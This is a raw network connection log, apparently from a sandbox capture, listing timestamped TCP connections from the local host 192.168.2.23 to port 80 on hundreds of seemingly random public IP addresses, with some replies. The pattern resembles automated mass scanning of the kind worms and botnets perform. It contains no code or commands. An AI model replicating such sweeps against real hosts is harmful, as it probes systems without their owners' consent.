                                                Dec 3, 2024 22:16:48.367826939 CET5008480192.168.2.23141.23.106.58
                                                Dec 3, 2024 22:16:48.368370056 CET4142680192.168.2.23202.130.12.212
                                                Dec 3, 2024 22:16:48.368910074 CET6017680192.168.2.2399.212.18.166
                                                Dec 3, 2024 22:16:48.369462967 CET5007480192.168.2.23178.167.225.20
                                                Dec 3, 2024 22:16:48.370017052 CET3575280192.168.2.23112.106.103.207
                                                Dec 3, 2024 22:16:48.370548010 CET4121880192.168.2.2372.185.180.188
                                                Dec 3, 2024 22:16:48.371093988 CET4269880192.168.2.2386.87.136.30
                                                Dec 3, 2024 22:16:48.371632099 CET5150480192.168.2.23120.125.222.84
                                                Dec 3, 2024 22:16:48.372167110 CET4060280192.168.2.2318.120.91.237
                                                Dec 3, 2024 22:16:48.372700930 CET4886680192.168.2.2349.132.127.254
                                                Dec 3, 2024 22:16:48.373246908 CET3448280192.168.2.2364.69.46.207
                                                Dec 3, 2024 22:16:48.373800039 CET6092680192.168.2.2332.60.240.155
                                                Dec 3, 2024 22:16:48.374321938 CET3307080192.168.2.23116.198.57.17
                                                Dec 3, 2024 22:16:48.374856949 CET3968080192.168.2.23149.70.197.245
                                                Dec 3, 2024 22:16:48.375389099 CET3717680192.168.2.231.252.247.68
                                                Dec 3, 2024 22:16:48.375936985 CET5201280192.168.2.23101.26.29.84
                                                Dec 3, 2024 22:16:48.376451969 CET4170280192.168.2.2386.199.183.40
                                                Dec 3, 2024 22:16:48.376986980 CET3795080192.168.2.23159.180.151.117
                                                Dec 3, 2024 22:16:48.377504110 CET3555880192.168.2.23159.216.106.173
                                                Dec 3, 2024 22:16:48.378058910 CET4458880192.168.2.23186.244.224.1
                                                Dec 3, 2024 22:16:48.378587008 CET5434080192.168.2.2389.199.198.11
                                                Dec 3, 2024 22:16:48.379110098 CET5367880192.168.2.2313.77.179.192
                                                Dec 3, 2024 22:16:48.379693031 CET3455480192.168.2.2344.97.239.58
                                                Dec 3, 2024 22:16:48.380264044 CET3476080192.168.2.23210.36.162.136
                                                Dec 3, 2024 22:16:48.380800962 CET5948880192.168.2.2389.148.112.82
                                                Dec 3, 2024 22:16:48.381340981 CET5574880192.168.2.2350.18.129.224
                                                Dec 3, 2024 22:16:48.381874084 CET5639080192.168.2.23201.216.93.118
                                                Dec 3, 2024 22:16:48.382419109 CET5283680192.168.2.2383.119.82.146
                                                Dec 3, 2024 22:16:48.382961035 CET4826880192.168.2.2370.167.174.224
                                                Dec 3, 2024 22:16:48.383495092 CET3551080192.168.2.2319.67.64.37
                                                Dec 3, 2024 22:16:48.384028912 CET4924280192.168.2.23156.47.9.159
                                                Dec 3, 2024 22:16:48.384576082 CET4238480192.168.2.2395.148.172.170
                                                Dec 3, 2024 22:16:48.385111094 CET5983880192.168.2.238.163.124.143
                                                Dec 3, 2024 22:16:48.385716915 CET5588280192.168.2.2370.48.67.132
                                                Dec 3, 2024 22:16:48.386256933 CET4553080192.168.2.231.78.144.178
                                                Dec 3, 2024 22:16:48.386784077 CET5637480192.168.2.23163.247.225.173
                                                Dec 3, 2024 22:16:48.387306929 CET5751080192.168.2.23117.255.80.131
                                                Dec 3, 2024 22:16:48.387859106 CET5480280192.168.2.2369.105.106.1
                                                Dec 3, 2024 22:16:48.388410091 CET5454480192.168.2.23137.84.118.55
                                                Dec 3, 2024 22:16:48.388919115 CET3610080192.168.2.23148.77.50.206
                                                Dec 3, 2024 22:16:48.389432907 CET4616480192.168.2.23120.53.85.174
                                                Dec 3, 2024 22:16:48.389967918 CET4331680192.168.2.23115.161.242.231
                                                Dec 3, 2024 22:16:48.390485048 CET5081480192.168.2.23189.63.67.242
                                                Dec 3, 2024 22:16:48.390996933 CET3405080192.168.2.23133.151.36.237
                                                Dec 3, 2024 22:16:48.391520023 CET3374680192.168.2.2351.0.21.42
                                                Dec 3, 2024 22:16:48.392013073 CET4549680192.168.2.23161.115.163.88
                                                Dec 3, 2024 22:16:48.392533064 CET4035480192.168.2.23177.102.58.160
                                                Dec 3, 2024 22:16:48.393040895 CET3669680192.168.2.2383.228.148.68
                                                Dec 3, 2024 22:16:48.393551111 CET3790480192.168.2.23208.170.5.222
                                                Dec 3, 2024 22:16:48.394056082 CET3780280192.168.2.23205.37.220.224
                                                Dec 3, 2024 22:16:48.394568920 CET5027480192.168.2.23122.157.177.130
                                                Dec 3, 2024 22:16:48.395097017 CET3945280192.168.2.23150.32.225.133
                                                Dec 3, 2024 22:16:48.395597935 CET4271880192.168.2.23200.134.217.200
                                                Dec 3, 2024 22:16:48.396104097 CET3484880192.168.2.2373.104.148.95
                                                Dec 3, 2024 22:16:48.396621943 CET5539080192.168.2.23103.104.235.120
                                                Dec 3, 2024 22:16:48.397128105 CET3712480192.168.2.2352.147.152.231
                                                Dec 3, 2024 22:16:48.397619963 CET4161880192.168.2.23101.211.231.251
                                                Dec 3, 2024 22:16:48.398124933 CET5560680192.168.2.23138.128.101.135
                                                Dec 3, 2024 22:16:48.398603916 CET5642480192.168.2.23145.20.17.13
                                                Dec 3, 2024 22:16:48.399100065 CET5407280192.168.2.23194.18.61.94
                                                Dec 3, 2024 22:16:48.399595976 CET4400280192.168.2.2393.134.211.187
                                                Dec 3, 2024 22:16:48.400115013 CET5508680192.168.2.232.233.134.116
                                                Dec 3, 2024 22:16:48.400612116 CET4915480192.168.2.23107.229.45.191
                                                Dec 3, 2024 22:16:48.401108980 CET3686480192.168.2.23159.157.188.52
                                                Dec 3, 2024 22:16:48.401617050 CET5182080192.168.2.23110.23.29.220
                                                Dec 3, 2024 22:16:48.402137041 CET4811680192.168.2.2354.6.47.124
                                                Dec 3, 2024 22:16:48.402662039 CET4100680192.168.2.2397.55.138.48
                                                Dec 3, 2024 22:16:48.403182030 CET4013280192.168.2.23128.106.21.141
                                                Dec 3, 2024 22:16:48.403681993 CET3335280192.168.2.23213.75.138.155
                                                Dec 3, 2024 22:16:48.404197931 CET4599480192.168.2.2393.104.201.65
                                                Dec 3, 2024 22:16:48.404721022 CET6008680192.168.2.23176.10.51.162
                                                Dec 3, 2024 22:16:48.405227900 CET4476280192.168.2.23201.157.7.217
                                                Dec 3, 2024 22:16:48.480154991 CET803770753.119.123.13192.168.2.23
                                                Dec 3, 2024 22:16:48.480166912 CET803770746.29.80.182192.168.2.23
                                                Dec 3, 2024 22:16:48.480175018 CET8037707167.169.37.108192.168.2.23
                                                Dec 3, 2024 22:16:48.480221033 CET803770723.13.227.180192.168.2.23
                                                Dec 3, 2024 22:16:48.480228901 CET8037707108.128.143.21192.168.2.23
                                                Dec 3, 2024 22:16:48.480235100 CET8037707136.30.197.42192.168.2.23
                                                Dec 3, 2024 22:16:48.480242014 CET8037707142.178.71.247192.168.2.23
                                                Dec 3, 2024 22:16:48.480251074 CET80377075.50.172.102192.168.2.23
                                                Dec 3, 2024 22:16:48.480258942 CET8037707217.15.168.25192.168.2.23
                                                Dec 3, 2024 22:16:48.480267048 CET8037707131.208.168.66192.168.2.23
                                                Dec 3, 2024 22:16:48.480346918 CET803770795.62.162.133192.168.2.23
                                                Dec 3, 2024 22:16:48.480355978 CET803770718.127.172.217192.168.2.23
                                                Dec 3, 2024 22:16:48.480359077 CET8037707106.125.175.246192.168.2.23
                                                Dec 3, 2024 22:16:48.480361938 CET8037707169.221.82.62192.168.2.23
                                                Dec 3, 2024 22:16:48.480365992 CET8037707213.10.8.153192.168.2.23
                                                Dec 3, 2024 22:16:48.480370045 CET8037707212.233.37.111192.168.2.23
                                                Dec 3, 2024 22:16:48.480377913 CET8037707115.142.226.34192.168.2.23
                                                Dec 3, 2024 22:16:48.480381966 CET8037707169.222.102.55192.168.2.23
                                                Dec 3, 2024 22:16:48.480390072 CET803770781.160.177.209192.168.2.23
                                                Dec 3, 2024 22:16:48.480401039 CET8037707200.233.228.26192.168.2.23
                                                Dec 3, 2024 22:16:48.480411053 CET8037707160.218.104.120192.168.2.23
                                                Dec 3, 2024 22:16:48.480418921 CET8037707142.163.169.148192.168.2.23
                                                Dec 3, 2024 22:16:48.480427980 CET8037707154.12.53.212192.168.2.23
                                                Dec 3, 2024 22:16:48.480434895 CET803770749.32.115.49192.168.2.23
                                                Dec 3, 2024 22:16:48.480443001 CET80377075.127.244.194192.168.2.23
                                                Dec 3, 2024 22:16:48.480513096 CET3770780192.168.2.23142.163.169.148
                                                Dec 3, 2024 22:16:48.480513096 CET3770780192.168.2.23160.218.104.120
                                                Dec 3, 2024 22:16:48.480515003 CET3770780192.168.2.2353.119.123.13
                                                Dec 3, 2024 22:16:48.480515003 CET3770780192.168.2.2323.13.227.180
                                                Dec 3, 2024 22:16:48.480515003 CET3770780192.168.2.23136.30.197.42
                                                Dec 3, 2024 22:16:48.480515003 CET3770780192.168.2.235.50.172.102
                                                Dec 3, 2024 22:16:48.480515003 CET3770780192.168.2.23167.169.37.108
                                                Dec 3, 2024 22:16:48.480519056 CET3770780192.168.2.2346.29.80.182
                                                Dec 3, 2024 22:16:48.480519056 CET3770780192.168.2.23106.125.175.246
                                                Dec 3, 2024 22:16:48.480519056 CET3770780192.168.2.23213.10.8.153
                                                Dec 3, 2024 22:16:48.480519056 CET3770780192.168.2.23131.208.168.66
                                                Dec 3, 2024 22:16:48.480519056 CET3770780192.168.2.2318.127.172.217
                                                Dec 3, 2024 22:16:48.480523109 CET3770780192.168.2.235.127.244.194
                                                Dec 3, 2024 22:16:48.480519056 CET3770780192.168.2.23212.233.37.111
                                                Dec 3, 2024 22:16:48.480515957 CET3770780192.168.2.23200.233.228.26
                                                Dec 3, 2024 22:16:48.480518103 CET3770780192.168.2.2381.160.177.209
                                                Dec 3, 2024 22:16:48.480518103 CET3770780192.168.2.2349.32.115.49
                                                Dec 3, 2024 22:16:48.480515957 CET3770780192.168.2.23154.12.53.212
                                                Dec 3, 2024 22:16:48.480519056 CET3770780192.168.2.23115.142.226.34
                                                Dec 3, 2024 22:16:48.480523109 CET3770780192.168.2.23108.128.143.21
                                                Dec 3, 2024 22:16:48.480520010 CET3770780192.168.2.23169.222.102.55
                                                Dec 3, 2024 22:16:48.480523109 CET3770780192.168.2.23217.15.168.25
                                                Dec 3, 2024 22:16:48.480523109 CET3770780192.168.2.23142.178.71.247
                                                Dec 3, 2024 22:16:48.480523109 CET3770780192.168.2.2395.62.162.133
                                                Dec 3, 2024 22:16:48.480523109 CET3770780192.168.2.23169.221.82.62
                                                Dec 3, 2024 22:16:48.480958939 CET8037707181.65.9.144192.168.2.23
                                                Dec 3, 2024 22:16:48.480967999 CET803770731.241.177.96192.168.2.23
                                                Dec 3, 2024 22:16:48.480976105 CET803770785.169.121.46192.168.2.23
                                                Dec 3, 2024 22:16:48.481004000 CET3770780192.168.2.2331.241.177.96
                                                Dec 3, 2024 22:16:48.481005907 CET3770780192.168.2.23181.65.9.144
                                                Dec 3, 2024 22:16:48.481023073 CET3770780192.168.2.2385.169.121.46
                                                Dec 3, 2024 22:16:48.481060982 CET803770734.151.16.91192.168.2.23
                                                Dec 3, 2024 22:16:48.481070995 CET8037707217.183.41.38192.168.2.23
                                                Dec 3, 2024 22:16:48.481075048 CET8037707152.246.192.251192.168.2.23
                                                Dec 3, 2024 22:16:48.481082916 CET8037707119.172.191.200192.168.2.23
                                                Dec 3, 2024 22:16:48.481092930 CET803770770.115.204.233192.168.2.23
                                                Dec 3, 2024 22:16:48.481101990 CET803770737.243.32.210192.168.2.23
                                                Dec 3, 2024 22:16:48.481107950 CET3770780192.168.2.2334.151.16.91
                                                Dec 3, 2024 22:16:48.481111050 CET8037707140.113.193.143192.168.2.23
                                                Dec 3, 2024 22:16:48.481111050 CET3770780192.168.2.23152.246.192.251
                                                Dec 3, 2024 22:16:48.481115103 CET3770780192.168.2.23217.183.41.38
                                                Dec 3, 2024 22:16:48.481118917 CET8037707136.144.36.108192.168.2.23
                                                Dec 3, 2024 22:16:48.481122017 CET3770780192.168.2.2370.115.204.233
                                                Dec 3, 2024 22:16:48.481127024 CET8037707191.107.11.36192.168.2.23
                                                Dec 3, 2024 22:16:48.481127024 CET3770780192.168.2.23119.172.191.200
                                                Dec 3, 2024 22:16:48.481136084 CET8037707167.92.86.165192.168.2.23
                                                Dec 3, 2024 22:16:48.481137991 CET3770780192.168.2.2337.243.32.210
                                                Dec 3, 2024 22:16:48.481142998 CET3770780192.168.2.23140.113.193.143
                                                Dec 3, 2024 22:16:48.481144905 CET8037707192.212.43.199192.168.2.23
                                                Dec 3, 2024 22:16:48.481148005 CET3770780192.168.2.23136.144.36.108
                                                Dec 3, 2024 22:16:48.481154919 CET8037707198.156.213.123192.168.2.23
                                                Dec 3, 2024 22:16:48.481158972 CET3770780192.168.2.23167.92.86.165
                                                Dec 3, 2024 22:16:48.481162071 CET3770780192.168.2.23191.107.11.36
                                                Dec 3, 2024 22:16:48.481172085 CET8037707148.48.36.241192.168.2.23
                                                Dec 3, 2024 22:16:48.481180906 CET803770765.214.181.153192.168.2.23
                                                Dec 3, 2024 22:16:48.481184006 CET3770780192.168.2.23192.212.43.199
                                                Dec 3, 2024 22:16:48.481185913 CET3770780192.168.2.23198.156.213.123
                                                Dec 3, 2024 22:16:48.481189966 CET8037707138.83.212.12192.168.2.23
                                                Dec 3, 2024 22:16:48.481198072 CET803770749.170.211.252192.168.2.23
                                                Dec 3, 2024 22:16:48.481205940 CET3770780192.168.2.23148.48.36.241
                                                Dec 3, 2024 22:16:48.481205940 CET803770774.26.255.208192.168.2.23
                                                Dec 3, 2024 22:16:48.481215954 CET8037707155.242.230.208192.168.2.23
                                                Dec 3, 2024 22:16:48.481220961 CET3770780192.168.2.2349.170.211.252
                                                Dec 3, 2024 22:16:48.481225014 CET8037707155.238.126.130192.168.2.23
                                                Dec 3, 2024 22:16:48.481229067 CET3770780192.168.2.2365.214.181.153
                                                Dec 3, 2024 22:16:48.481229067 CET3770780192.168.2.23138.83.212.12
                                                Dec 3, 2024 22:16:48.481230974 CET3770780192.168.2.2374.26.255.208
                                                Dec 3, 2024 22:16:48.481232882 CET8037707198.58.44.28192.168.2.23
                                                Dec 3, 2024 22:16:48.481240988 CET803770761.49.59.95192.168.2.23
                                                Dec 3, 2024 22:16:48.481249094 CET803770741.199.54.166192.168.2.23
                                                Dec 3, 2024 22:16:48.481251955 CET3770780192.168.2.23155.242.230.208
                                                Dec 3, 2024 22:16:48.481252909 CET3770780192.168.2.23155.238.126.130
                                                Dec 3, 2024 22:16:48.481256962 CET803770778.225.83.108192.168.2.23
                                                Dec 3, 2024 22:16:48.481265068 CET8037707160.22.231.162192.168.2.23
                                                Dec 3, 2024 22:16:48.481273890 CET803770749.9.159.2192.168.2.23
                                                Dec 3, 2024 22:16:48.481281996 CET3770780192.168.2.23198.58.44.28
                                                Dec 3, 2024 22:16:48.481281996 CET3770780192.168.2.2361.49.59.95
                                                Dec 3, 2024 22:16:48.481292009 CET3770780192.168.2.2341.199.54.166
                                                Dec 3, 2024 22:16:48.481292009 CET3770780192.168.2.2378.225.83.108
                                                Dec 3, 2024 22:16:48.481292009 CET3770780192.168.2.23160.22.231.162
                                                Dec 3, 2024 22:16:48.481296062 CET3770780192.168.2.2349.9.159.2
                                                Dec 3, 2024 22:16:48.481609106 CET803770797.109.8.190192.168.2.23
                                                Dec 3, 2024 22:16:48.481654882 CET3770780192.168.2.2397.109.8.190
                                                Dec 3, 2024 22:16:48.481664896 CET803770748.45.33.1192.168.2.23
                                                Dec 3, 2024 22:16:48.481673002 CET8037707221.122.86.68192.168.2.23
                                                Dec 3, 2024 22:16:48.481679916 CET8037707191.134.154.213192.168.2.23
                                                Dec 3, 2024 22:16:48.481690884 CET803770754.118.208.76192.168.2.23
                                                Dec 3, 2024 22:16:48.481699944 CET3770780192.168.2.2348.45.33.1
                                                Dec 3, 2024 22:16:48.481705904 CET3770780192.168.2.23221.122.86.68
                                                Dec 3, 2024 22:16:48.481705904 CET3770780192.168.2.23191.134.154.213
                                                Dec 3, 2024 22:16:48.481713057 CET803770764.183.73.170192.168.2.23
                                                Dec 3, 2024 22:16:48.481722116 CET8037707159.56.174.211192.168.2.23
                                                Dec 3, 2024 22:16:48.481724024 CET3770780192.168.2.2354.118.208.76
                                                Dec 3, 2024 22:16:48.481725931 CET803770745.12.195.164192.168.2.23
                                                Dec 3, 2024 22:16:48.481733084 CET8037707159.116.117.246192.168.2.23
                                                Dec 3, 2024 22:16:48.481739998 CET8037707152.163.182.239192.168.2.23
                                                Dec 3, 2024 22:16:48.481750011 CET8037707185.67.81.158192.168.2.23
                                                Dec 3, 2024 22:16:48.481751919 CET3770780192.168.2.2364.183.73.170
                                                Dec 3, 2024 22:16:48.481758118 CET3770780192.168.2.23159.56.174.211
                                                Dec 3, 2024 22:16:48.481758118 CET3770780192.168.2.2345.12.195.164
                                                Dec 3, 2024 22:16:48.481758118 CET3770780192.168.2.23159.116.117.246
                                                Dec 3, 2024 22:16:48.481775999 CET3770780192.168.2.23185.67.81.158
                                                Dec 3, 2024 22:16:48.481779099 CET3770780192.168.2.23152.163.182.239
                                                Dec 3, 2024 22:16:48.481904030 CET803770770.110.93.209192.168.2.23
                                                Dec 3, 2024 22:16:48.481913090 CET803770795.52.35.119192.168.2.23
                                                Dec 3, 2024 22:16:48.481921911 CET803770741.116.190.246192.168.2.23
                                                Dec 3, 2024 22:16:48.481930017 CET8037707121.206.66.7192.168.2.23
                                                Dec 3, 2024 22:16:48.481936932 CET8037707205.239.190.25192.168.2.23
                                                Dec 3, 2024 22:16:48.481945038 CET80377075.79.198.83192.168.2.23
                                                Dec 3, 2024 22:16:48.481950045 CET3770780192.168.2.2370.110.93.209
                                                Dec 3, 2024 22:16:48.481950045 CET3770780192.168.2.2395.52.35.119
                                                Dec 3, 2024 22:16:48.481950045 CET3770780192.168.2.2341.116.190.246
                                                Dec 3, 2024 22:16:48.481954098 CET80377079.55.80.214192.168.2.23
                                                Dec 3, 2024 22:16:48.481961966 CET3770780192.168.2.23121.206.66.7
                                                Dec 3, 2024 22:16:48.481961966 CET803770798.2.111.48192.168.2.23
                                                Dec 3, 2024 22:16:48.481971025 CET8037707208.29.93.130192.168.2.23
                                                Dec 3, 2024 22:16:48.481972933 CET3770780192.168.2.235.79.198.83
                                                Dec 3, 2024 22:16:48.481976986 CET3770780192.168.2.23205.239.190.25
                                                Dec 3, 2024 22:16:48.481978893 CET8037707206.126.155.60192.168.2.23
                                                Dec 3, 2024 22:16:48.481987953 CET8037707116.155.109.84192.168.2.23
                                                Dec 3, 2024 22:16:48.481987953 CET3770780192.168.2.2398.2.111.48
                                                Dec 3, 2024 22:16:48.481996059 CET803770776.65.219.244192.168.2.23
                                                Dec 3, 2024 22:16:48.481996059 CET3770780192.168.2.239.55.80.214
                                                Dec 3, 2024 22:16:48.481998920 CET3770780192.168.2.23208.29.93.130
                                                Dec 3, 2024 22:16:48.482007980 CET803770775.103.26.120192.168.2.23
                                                Dec 3, 2024 22:16:48.482008934 CET3770780192.168.2.23206.126.155.60
                                                Dec 3, 2024 22:16:48.482017040 CET8037707176.179.123.31192.168.2.23
                                                Dec 3, 2024 22:16:48.482017994 CET3770780192.168.2.23116.155.109.84
                                                Dec 3, 2024 22:16:48.482027054 CET8037707145.88.33.231192.168.2.23
                                                Dec 3, 2024 22:16:48.482027054 CET3770780192.168.2.2376.65.219.244
                                                Dec 3, 2024 22:16:48.482036114 CET803770739.90.156.179192.168.2.23
                                                Dec 3, 2024 22:16:48.482043982 CET8037707206.149.237.196192.168.2.23
                                                Dec 3, 2024 22:16:48.482048035 CET3770780192.168.2.23176.179.123.31
                                                Dec 3, 2024 22:16:48.482053041 CET3770780192.168.2.2375.103.26.120
                                                Dec 3, 2024 22:16:48.482069016 CET3770780192.168.2.23145.88.33.231
                                                Dec 3, 2024 22:16:48.482069016 CET3770780192.168.2.2339.90.156.179
                                                Dec 3, 2024 22:16:48.482076883 CET3770780192.168.2.23206.149.237.196
                                                Dec 3, 2024 22:16:48.487852097 CET8050084141.23.106.58192.168.2.23
                                                Dec 3, 2024 22:16:48.487937927 CET5008480192.168.2.23141.23.106.58
                                                Dec 3, 2024 22:16:48.488456964 CET3657880192.168.2.2353.119.123.13
                                                Dec 3, 2024 22:16:48.488961935 CET5790480192.168.2.2323.13.227.180
                                                Dec 3, 2024 22:16:48.489478111 CET4194680192.168.2.23108.128.143.21
                                                Dec 3, 2024 22:16:48.490003109 CET3816880192.168.2.23136.30.197.42
                                                Dec 3, 2024 22:16:48.490511894 CET5380480192.168.2.2346.29.80.182
                                                Dec 3, 2024 22:16:48.491051912 CET5133280192.168.2.235.50.172.102
                                                Dec 3, 2024 22:16:48.491563082 CET3563280192.168.2.23217.15.168.25
                                                Dec 3, 2024 22:16:48.492075920 CET5699480192.168.2.23106.125.175.246
                                                Dec 3, 2024 22:16:48.492624044 CET5895080192.168.2.23213.10.8.153
                                                Dec 3, 2024 22:16:48.493140936 CET3798080192.168.2.23167.169.37.108
                                                Dec 3, 2024 22:16:48.493644953 CET4759680192.168.2.23142.178.71.247
                                                Dec 3, 2024 22:16:48.494205952 CET5306280192.168.2.23131.208.168.66
                                                Dec 3, 2024 22:16:48.494740963 CET4175480192.168.2.2395.62.162.133
                                                Dec 3, 2024 22:16:48.495238066 CET4281080192.168.2.2318.127.172.217
                                                Dec 3, 2024 22:16:48.495790005 CET4872480192.168.2.23169.221.82.62
                                                Dec 3, 2024 22:16:48.496326923 CET5174080192.168.2.23212.233.37.111
                                                Dec 3, 2024 22:16:48.496840000 CET5996280192.168.2.23115.142.226.34
                                                Dec 3, 2024 22:16:48.497364998 CET5662680192.168.2.23169.222.102.55
                                                Dec 3, 2024 22:16:48.497893095 CET5536880192.168.2.2381.160.177.209
                                                Dec 3, 2024 22:16:48.498442888 CET5714680192.168.2.23200.233.228.26
                                                Dec 3, 2024 22:16:48.498944044 CET3472080192.168.2.23160.218.104.120
                                                Dec 3, 2024 22:16:48.499445915 CET4943080192.168.2.23142.163.169.148
                                                Dec 3, 2024 22:16:48.499655962 CET803455444.97.239.58192.168.2.23
                                                Dec 3, 2024 22:16:48.499691963 CET3455480192.168.2.2344.97.239.58
                                                Dec 3, 2024 22:16:48.500025034 CET4077080192.168.2.23154.12.53.212
                                                Dec 3, 2024 22:16:48.500516891 CET5331280192.168.2.2349.32.115.49
                                                Dec 3, 2024 22:16:48.501009941 CET5924680192.168.2.235.127.244.194
                                                Dec 3, 2024 22:16:48.501492977 CET4202080192.168.2.23181.65.9.144
                                                Dec 3, 2024 22:16:48.502019882 CET4235480192.168.2.2331.241.177.96
                                                Dec 3, 2024 22:16:48.502545118 CET3404280192.168.2.2385.169.121.46
                                                Dec 3, 2024 22:16:48.503043890 CET5488480192.168.2.2334.151.16.91
                                                Dec 3, 2024 22:16:48.503540993 CET4667880192.168.2.23217.183.41.38
                                                Dec 3, 2024 22:16:48.504062891 CET5207480192.168.2.23152.246.192.251
                                                Dec 3, 2024 22:16:48.504605055 CET5981480192.168.2.2370.115.204.233
                                                Dec 3, 2024 22:16:48.505150080 CET4374880192.168.2.23119.172.191.200
                                                Dec 3, 2024 22:16:48.505701065 CET3393480192.168.2.2337.243.32.210
                                                Dec 3, 2024 22:16:48.506249905 CET5279480192.168.2.23140.113.193.143
                                                Dec 3, 2024 22:16:48.506779909 CET4998480192.168.2.23136.144.36.108
                                                Dec 3, 2024 22:16:48.507333040 CET5841280192.168.2.23191.107.11.36
                                                Dec 3, 2024 22:16:48.507833958 CET805480269.105.106.1192.168.2.23
                                                Dec 3, 2024 22:16:48.507854939 CET5512080192.168.2.23167.92.86.165
                                                Dec 3, 2024 22:16:48.507869959 CET5480280192.168.2.2369.105.106.1
                                                Dec 3, 2024 22:16:48.508400917 CET5367680192.168.2.23192.212.43.199
                                                Dec 3, 2024 22:16:48.508936882 CET3805080192.168.2.23198.156.213.123
                                                Dec 3, 2024 22:16:48.509474039 CET4142480192.168.2.23148.48.36.241
                                                Dec 3, 2024 22:16:48.510020018 CET4368480192.168.2.2365.214.181.153
                                                Dec 3, 2024 22:16:48.510544062 CET6046080192.168.2.23138.83.212.12
                                                Dec 3, 2024 22:16:48.511089087 CET3849280192.168.2.2349.170.211.252
                                                Dec 3, 2024 22:16:48.511620045 CET4949080192.168.2.2374.26.255.208
                                                Dec 3, 2024 22:16:48.512149096 CET6022680192.168.2.23155.242.230.208
                                                Dec 3, 2024 22:16:48.512662888 CET5722280192.168.2.23155.238.126.130
                                                Dec 3, 2024 22:16:48.513165951 CET5097680192.168.2.23198.58.44.28
                                                Dec 3, 2024 22:16:48.513683081 CET6020080192.168.2.2361.49.59.95
                                                Dec 3, 2024 22:16:48.514203072 CET4015480192.168.2.2341.199.54.166
                                                Dec 3, 2024 22:16:48.514722109 CET4915680192.168.2.2378.225.83.108
                                                Dec 3, 2024 22:16:48.515230894 CET5749080192.168.2.23160.22.231.162
                                                Dec 3, 2024 22:16:48.515762091 CET4547680192.168.2.2349.9.159.2
                                                Dec 3, 2024 22:16:48.516275883 CET4501080192.168.2.2397.109.8.190
                                                Dec 3, 2024 22:16:48.516784906 CET5716680192.168.2.2348.45.33.1
                                                Dec 3, 2024 22:16:48.517311096 CET3729880192.168.2.23221.122.86.68
                                                Dec 3, 2024 22:16:48.517826080 CET6001080192.168.2.23191.134.154.213
                                                Dec 3, 2024 22:16:48.518357992 CET3995680192.168.2.2354.118.208.76
                                                Dec 3, 2024 22:16:48.518868923 CET5917880192.168.2.2364.183.73.170
                                                Dec 3, 2024 22:16:48.519390106 CET5821480192.168.2.23159.56.174.211
                                                Dec 3, 2024 22:16:48.519740105 CET804400293.134.211.187192.168.2.23
                                                Dec 3, 2024 22:16:48.519807100 CET4400280192.168.2.2393.134.211.187
                                                Dec 3, 2024 22:16:48.519901037 CET5991480192.168.2.2345.12.195.164
                                                Dec 3, 2024 22:16:48.520427942 CET5932880192.168.2.23159.116.117.246
                                                Dec 3, 2024 22:16:48.520971060 CET5749880192.168.2.23152.163.182.239
                                                Dec 3, 2024 22:16:48.521492004 CET4023880192.168.2.23185.67.81.158
                                                Dec 3, 2024 22:16:48.521995068 CET3974680192.168.2.2370.110.93.209
                                                Dec 3, 2024 22:16:48.522516966 CET4758280192.168.2.2395.52.35.119
                                                Dec 3, 2024 22:16:48.523051023 CET4049080192.168.2.2341.116.190.246
                                                Dec 3, 2024 22:16:48.523557901 CET4200280192.168.2.23121.206.66.7
                                                Dec 3, 2024 22:16:48.524049044 CET3567080192.168.2.235.79.198.83
                                                Dec 3, 2024 22:16:48.524561882 CET3905680192.168.2.23205.239.190.25
                                                Dec 3, 2024 22:16:48.525094986 CET3383880192.168.2.239.55.80.214
                                                Dec 3, 2024 22:16:48.525635004 CET4419880192.168.2.2398.2.111.48
                                                Dec 3, 2024 22:16:48.526137114 CET5838080192.168.2.23208.29.93.130
                                                Dec 3, 2024 22:16:48.526648045 CET3934680192.168.2.23206.126.155.60
                                                Dec 3, 2024 22:16:48.527160883 CET3961280192.168.2.23116.155.109.84
                                                Dec 3, 2024 22:16:48.527698040 CET4885280192.168.2.2376.65.219.244
                                                Dec 3, 2024 22:16:48.528244972 CET5199680192.168.2.2375.103.26.120
                                                Dec 3, 2024 22:16:48.528811932 CET3701480192.168.2.23176.179.123.31
                                                Dec 3, 2024 22:16:48.529346943 CET3326080192.168.2.23145.88.33.231
                                                Dec 3, 2024 22:16:48.529892921 CET3521280192.168.2.2339.90.156.179
                                                Dec 3, 2024 22:16:48.530428886 CET5786280192.168.2.23206.149.237.196
                                                Dec 3, 2024 22:16:48.532468081 CET5039080192.168.2.23141.23.106.58
                                                Dec 3, 2024 22:16:48.532780886 CET3455480192.168.2.2344.97.239.58
                                                Dec 3, 2024 22:16:48.532780886 CET3455480192.168.2.2344.97.239.58
                                                Dec 3, 2024 22:16:48.533041000 CET3481880192.168.2.2344.97.239.58
                                                Dec 3, 2024 22:16:48.533075094 CET5008480192.168.2.23141.23.106.58
                                                Dec 3, 2024 22:16:48.533075094 CET5008480192.168.2.23141.23.106.58
                                                Dec 3, 2024 22:16:48.533349037 CET5480280192.168.2.2369.105.106.1
                                                Dec 3, 2024 22:16:48.533349037 CET5480280192.168.2.2369.105.106.1
                                                Dec 3, 2024 22:16:48.533582926 CET5503880192.168.2.2369.105.106.1
                                                Dec 3, 2024 22:16:48.533982992 CET4400280192.168.2.2393.134.211.187
                                                Dec 3, 2024 22:16:48.533982992 CET4400280192.168.2.2393.134.211.187
                                                Dec 3, 2024 22:16:48.534224033 CET4419480192.168.2.2393.134.211.187
                                                Dec 3, 2024 22:16:48.608397961 CET803657853.119.123.13192.168.2.23
                                                Dec 3, 2024 22:16:48.608503103 CET3657880192.168.2.2353.119.123.13
                                                Dec 3, 2024 22:16:48.608711958 CET3657880192.168.2.2353.119.123.13
                                                Dec 3, 2024 22:16:48.608711958 CET3657880192.168.2.2353.119.123.13
                                                Dec 3, 2024 22:16:48.608875036 CET805790423.13.227.180192.168.2.23
                                                Dec 3, 2024 22:16:48.608913898 CET5790480192.168.2.2323.13.227.180
                                                Dec 3, 2024 22:16:48.609175920 CET3674880192.168.2.2353.119.123.13
                                                Dec 3, 2024 22:16:48.609404087 CET8041946108.128.143.21192.168.2.23
                                                Dec 3, 2024 22:16:48.609436035 CET4194680192.168.2.23108.128.143.21
                                                Dec 3, 2024 22:16:48.609553099 CET5790480192.168.2.2323.13.227.180
                                                Dec 3, 2024 22:16:48.609553099 CET5790480192.168.2.2323.13.227.180
                                                Dec 3, 2024 22:16:48.609797001 CET5807480192.168.2.2323.13.227.180
                                                Dec 3, 2024 22:16:48.609838963 CET8038168136.30.197.42192.168.2.23
                                                Dec 3, 2024 22:16:48.609875917 CET3816880192.168.2.23136.30.197.42
                                                Dec 3, 2024 22:16:48.610112906 CET4194680192.168.2.23108.128.143.21
